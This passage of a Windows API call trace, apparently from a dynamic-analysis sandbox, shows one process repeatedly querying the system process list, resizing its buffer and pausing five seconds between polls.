ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.021] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.030] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.043] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.059] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.079] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.099] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.108] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.131] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.150] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.182] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.202] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.216] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.230] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.246] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.304] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.309] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.330] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.345] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.355] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.372] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.386] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 